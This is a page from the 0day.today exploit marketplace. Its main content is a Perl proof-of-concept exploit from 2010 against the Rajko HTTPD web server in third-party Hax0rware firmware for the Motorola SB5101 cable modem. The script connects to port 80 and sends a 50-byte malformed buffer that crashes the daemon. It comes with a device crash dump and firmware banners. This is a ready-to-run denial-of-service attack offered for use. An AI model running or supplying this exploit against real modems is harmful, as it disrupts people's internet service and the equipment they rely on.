0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC
======================================================== Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC ======================================================== #!/usr/bin/perl # Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC # Author: Dillon Beresford # Date: 6/6/2010 # Vendor: SBHacker & Motorola # Software Link: http://www.sbhacker.net/forum/index.php # Tested on Hax0rware 1.1 R30, R32 and R39 # Description: Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit # If an unauthenticated user or attacker sends any number of bytes greater than 1 # to port 80 without a proper request line, such as, [ GET /somepath/file.cgi ] # the http daemon triggers a crash on thread at 0x8054b9ac Rajko HttpD. # The developer of Hax0rware said he has used the modem's local ip to bind to the webserver # to prevent attackers from triggering the vuln... This seems to be a quick fix atm. # I'm sure he will eventually fix the bug and update the firmware. # Motorola and Cable providers should warn their customers ( there are a number of legit ) # customers using this firmware for testing. Its important that you let # customers know about the risk of third party firmware that isn't open source. # nc 192.168.100.1 80 <sendsomeevil> # For debugging telnet into the device 192.168.100.1 and run the poc. # >>> YIKES... looks like you may have a problem! <<< # r0/zero=00000000 r1/at =fffffffe r2/v0 =805a1800 r3/v1 =00000000 # r4/a0 =8054aa58 r5/a1 =00000000 r6/a2 =00000000 r7/a3 =00000000 # r8/t0 =00000000 r9/t1 =807bcae4 r10/t2 =00000041 r11/t3 =000043e0 # r12/t4 =4d154e68 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005 # r16/s0 =8054bacc r17/s1 =00000000 r18/s2 =805a1800 r19/s3 =00000000 # r20/s4 =00000001 r21/s5 =0000002a r22/s6 =8054b848 r23/s7 =00000001 # r24/t8 =00000000 r25/t9 =00000059 r26/k0 =00000000 r27/k1 =11110017 # r28/gp =80458fa0 r29/sp =8054b830 r30/fp =8054b960 r31/ra =8054a514 # PC : 0x8054a534 error addr: 0x00000000 # cause: 0x00000008 status: 0x1000ff03 # BCM interrupt enable: ffffbff7, status: 00000000 # Bad PC or SP. Can't trace the stack. # Task: Rajko HttpD # --------------------------------------------------- # ID: 0x0006 # Handle: 0x8054b9ac # Set Priority: 23 # Current Priority: 23 # State: SUSP # Stack Base: 0x8054acd4 # Stack Size: 3280 bytes # Stack Used: 1940 bytes # Stack Stack Stack # TaskId TaskName Priority State Size Used Margin # ---------- -------------------------------- -------- -------- -------- -------- -------- # 0x8048f818 Idle Thread 31 RUN 2048 616 1432 # 0x805131d0 Network alarm support 6 SLEEP 2256 1232 1024 # 0x804924c8 Network support 7 SLEEP 8192 1704 6488 # 0x80513f20 pthread.00000800 15 EXIT 7852 1104 6748 # 0x8048a1c8 tStartup 18 SLEEP 12288 5208 7080 # 0x8054b9ac Rajko HttpD 23 SUSP 3280 1940 1340 # 0x807f579c NonVol Device Async Helper 25 SLEEP 3072 504 2568 # 0x807ebc7c Motorola Standby Switch Thread 23 SLEEP 4096 440 3656 # 0x807ea984 Motorola Vendor Ctl Thread 23 SLEEP 4096 512 3584 # 0x807f64e8 WDOG 17 RUN 5120 2784 2336 # 0x807e86b4 BFC Ping Thread 29 SLEEP 6144 476 5668 # 0x807e4b3c ConsoleThread 27 SLEEP 36864 2172 34692 # 0x807d687c TelnetD 23 RUN 2256 1980 276 # 0x807c666c CfgVB Thread 23 SLEEP 4096 504 3592 # 0x807c501c DHCM 25 SLEEP 16384 512 15872 # 0x807befac Event Log Thread 25 SLEEP 8192 2184 6008 # 0x8079a51c Time Of Day Thread 23 SLEEP 6144 456 5688 # 0x8079a98c CmDocsisIpThread 23 SLEEP 8192 504 7688 # 0x80793af8 CmBpiManagerThd 25 SLEEP 8192 508 7684 # 0x8078ff78 CmDsxHelper 23 SLEEP 8192 504 7688 # 0x807abf50 CmDocsisCtlThread 21 SLEEP 8192 608 7584 # 0x80788e44 Scan Downstream Thread 23 SLEEP 4096 1428 2668 # 0x80785c20 RateShaping Thread 23 SLEEP 4096 444 3652 # 0x807f65e0 CMHL 23 SLEEP 4500 368 4132 # 0x807f66d8 CMHH 21 SLEEP 4500 352 4148 # 0x807f67d0 ENRX 23 RUN 4500 1028 3472 # 0x807f68c8 ENTX 23 SLEEP 4500 784 3716 # 0x807f69c0 ELNK 23 SLEEP 4500 320 4180 # 0x807f6ab8 USTX 23 SLEEP 4500 340 4160 # 0x807f6bb0 USRX 23 SLEEP 4500 372 4128 # 0x807f6ca8 UBCT 19 SLEEP 4500 356 4144 # 0x807f6da0 USRN 23 SLEEP 4500 340 4160 # 0x806a5a34 DHCP Client Thread 23 SLEEP 12288 508 11780 # 0x807f6e98 IpHalIst 23 RUN 4500 844 3656 # 0x8069fb98 CmPropaneCtlThread 23 SLEEP 8192 1628 6564 # 0x8069cf3c IGMP Thread 23 SLEEP 4096 456 3640 # 0x8069b640 NetToMedia Thread 23 SLEEP 4096 796 3300 # 0x806975a8 Trap Thread 23 SLEEP 16384 516 15868 # 0x807f6030 SNMP Thread 23 SLEEP 20480 1176 19304 # 0x805a7f0c DHCP Server Thread 23 SLEEP 8192 1448 6744 # 0x8047b410 tNonVolTimer 30 SLEEP 2048 1028 1020 # Done! # * * # *** *** # *** *** # *** *** # ***** ***** # ***** ***** # ***** ***** # ******* ******* # ******* ******* # ******* ******* # ********* ********* # ********* ********* # **** *** *** **** # *** *** *** # *** * *** # ** ** # ** ** # ** ** # ** ** # * * # Motorola Corporation # +----------------------------------------------------------------------------+ # | _/_/ _/_/_/_/ _/_/ | # | _/ _/ _/ _/ _/ Broadband | # | _/ _/ _/ _/ | # | _/_/ _/_/_/ _/ Foundation | # | _/ _/ _/ _/ | # | _/ _/ _/ _/ _/ Classes | # | _/_/_/ _/ _/_/ | # | | # | Copyright (c) 1999 - 2007 Broadcom Corporation | # | | # | Revision: 3.9.33.3 RELEASE | # | | # | Features: Console Nonvol Fat HeapManager SNMP Networking USB1.1 | # +----------------------------------------------------------------------------+ # | Standard Embedded Target Support for BFC | # | | # | Copyright (c) 2003 - 2007 Broadcom Corporation | # | | # | Revision: 3.0.1 RELEASE | # | | # | Features: PID=0xc011 Bootloader-Rev=2.1.6d | # | Copyright (c) 2003 - 2007 Broadcom Corporation | # | | # | Revision: 3.0.1 RELEASE | # | | # | Features: PID=0xc011 Bootloader-Rev=2.1.6d | # | Features: Bootloader-Compression-Support=0x19 | # +----------------------------------------------------------------------------+ # | eCos BFC Application Layer | # | | # | Copyright (c) 1999 - 2007 Broadcom Corporation | # | | # | Revision: 3.0.2 RELEASE | # | | # | Features: eCos Console Cmds, (no Idle Loop Profiler) | # +----------------------------------------------------------------------------+ # | _/_/ _/ _/ | # | _/ _/ _/_/ _/_/ DOCSIS Cable Modem | # | _/ _/ _/ _/ | # | _/ _/ _/ | # | _/ _/ _/ | # | _/ _/ _/ _/ | # | _/_/ _/ _/ | # | | # | Copyright (c) 1999 - 2005 Broadcom Corporation | # | | # | Revision: 3.9.33.3 RELEASE | # | | # | Features: AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB | # | Features: Support CM Vendor Extension | # +----------------------------------------------------------------------------+ # | Motorola Data-Only CM Vendor Extension | # | | # | Revision: 3.0.0a RELEASE | # | | # | Features: DHCP Server HTTP Server | # +----------------------------------------------------------------------------+ # | Build Date: Apr 29 2009 | # | Build Time: 15:08:51 | # | Built By: vobadm02 | # +----------------------------------------------------------------------------+ use strict; use Socket; my $buff = "\x41" x50; my $cablemodemip = shift || '192.168.100.1'; my $port = shift || 80; my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($cablemodemip); my $paddr = sockaddr_in($port, $iaddr); print "+---------------------------------------------------------------+\n". "| Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC |\n". "| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n". "| Version: 1.1 R30, R32 and R39 |\n". "| Vendor: Motorola Corporation and SBHacker |\n". "| Author: Dillon Beresford |\n". "| Date: 6/6/2010 |\n". "+---------------------------------------------------------------+\n"; socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; print "[+] Connecting to cable modem httpd at $cablemodemip on port $port\n"; connect(SOCKET, $paddr) or die "connect: $!"; print "[+] Sending our evil buffer...\n"; print SOCKET $buff."\n"; print "[+] Payload sent\n"; print "[+] This takes some time please wait.\n"; print "[+] Dont look at me look at the leds on your modem\n"; close SOCKET or die "close: $!"; sleep(25); print "[+] Bye Bye Motorola SB5101 \n"; # 0day.today [2024-12-25] #